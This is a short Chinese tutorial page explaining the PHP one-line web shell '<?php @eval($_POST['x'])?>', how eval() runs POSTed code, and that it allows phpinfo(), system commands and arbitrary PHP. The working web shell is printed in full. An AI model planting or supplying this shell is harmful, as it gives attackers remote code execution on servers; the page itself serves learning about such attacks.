首頁 > 後端開發 > PHP問題 > php一句話圖片木馬怎麼解析

php一句話圖片木馬怎麼解析

王林
發布: 2023-02-24 08:34:01
原創
9496 人瀏覽過

php一句話圖片木馬怎麼解析

一句話木馬解析

首先,學習滲透時,木馬大概也就三種:大馬、小馬、一句話。

常見的一句話:

<?php @eval($_POST[&#39;x&#39;])?>
登入後複製

這個應該是最常見的了...看一下他的組成.

首先是一個eval函數,其次是post提交一個參數為x的值.首先我們看看eval函數是做什麼的。

官方說明:

eval() 函數把字串依照 PHP 程式碼來計算。

該字串必須是合法的 PHP 程式碼,且必須以分號結尾。

如果沒有在程式碼字串中呼叫 return 語句,則傳回 NULL。如果程式碼中存在解析錯誤,則 eval() 函數傳回 false。

語法:

eval(phpcode)
登入後複製

簡單來說就是他可以執行一些php的函數和php程式碼.有這個就夠了.
這樣我們了解就簡單多了,我們直接給他post傳一些PHP程式碼不就好了?
比如:phpinfo()函式,system函數等。

php一句話圖片木馬怎麼解析

可以看到我這裡的phpinfo函數已經被執行了。

命令執行也是可以的

php一句話圖片木馬怎麼解析

PHP程式碼也是可以順利執行:

php一句話圖片木馬怎麼解析

#推薦視頻教學:PHP影片教學

#

以上是php一句話圖片木馬怎麼解析的詳細內容。更多資訊請關注PHP中文網其他相關文章!

相關標籤:
來源:php.cn
本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn
熱門教學
更多>
最新下載
更多>
網站特效
網站源碼
網站素材
前端模板